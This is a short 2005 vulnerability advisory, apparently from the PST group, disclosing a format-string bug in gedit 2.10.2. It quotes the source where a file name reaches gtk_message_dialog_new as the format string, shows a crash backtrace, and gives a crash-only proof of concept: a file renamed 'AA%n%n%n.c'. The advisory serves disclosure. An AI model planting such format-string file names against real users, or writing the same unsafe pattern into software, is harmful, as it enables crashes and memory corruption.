pst.advisory: gedit fun. opensource is god .lol windows

pst.advisory: gedit fun. opensource is god .lol windows

创建时间：2005-05-20
文章属性：原创
文章提交：jsk__ (jsk_at_ph4nt0m.org)

Systems affected:

gedit 2.10.2


no affected

all exploitable  

1:why:  gedit is power tool .. it used to edit *.c *.pl *.py ............

when it open a bin  .. ths bin's name or filename is format strings ... it is exploitable


2:tips:


void
gedit_utils_error_reporting_loading_file (
        const gchar *uri,
        const GeditEncoding *encoding,
        GError *error,
        GtkWindow *parent)
{
............


    if (error_message == NULL)
    {
        if ((error == NULL) || (error->message == NULL))
            error_message = g_strdup_printf (
                                    _("Could not open the file \"%s\"."),
                         uri_for_display);................name
        else
            error_message = g_strdup_printf (
                                    _("Could not open the file \"%s\".\n\n%s."),
                         uri_for_display, error->message);..........name

    }

    g_free (encoding_name);

    dialog = gtk_message_dialog_new (
            parent,
            GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT,
               GTK_MESSAGE_ERROR,
               GTK_BUTTONS_OK,
            error_message);....................boom......
  

3: more show

Program received signal SIGSEGV, Segmentation fault.
0x40f9b740 in gtk_window_set_transient_for () from /usr/lib/libgtk-x11-2.0.so.0
(gdb) bt
#0  0x40f9b740 in gtk_window_set_transient_for ()
   from /usr/lib/libgtk-x11-2.0.so.0
#1  0x40ea33c9 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
#2  0x080723a1 in gedit_utils_error_reporting_loading_file ()
#3  0x080779f8 in gedit_file_open_from_stdin ()
#4  0x00000000 in ?? ()
#5  0x083f98e8 in ?? ()
#6  0x0813f538 in ?? ()
#7  0x080ad668 in TC_GNOME_Gedit_Application_struct ()
#8  0x08339e30 in ?? ()
#9  0x00000000 in ?? ()
#10 0x41287ca1 in __default_morecore () from /lib/libc.so.6


4: A LAME  proof-of-concept

bash-2.05b#cat fmtexp.c

#include <stdio.h>


int
main()
{
  printf("hah gedit\n");
}


bash-2.05b#gcc -o fk fmtexp.c

bash-2.05b#mv fk AA%n%n%n.c

bash-2.05b#gedit  AA%n%n%n.c

no working exploit will be here..:P



CREDIT:

jsk (www.0xbadexworm.org) discovery this vulnerability

ths: all members from PST and doris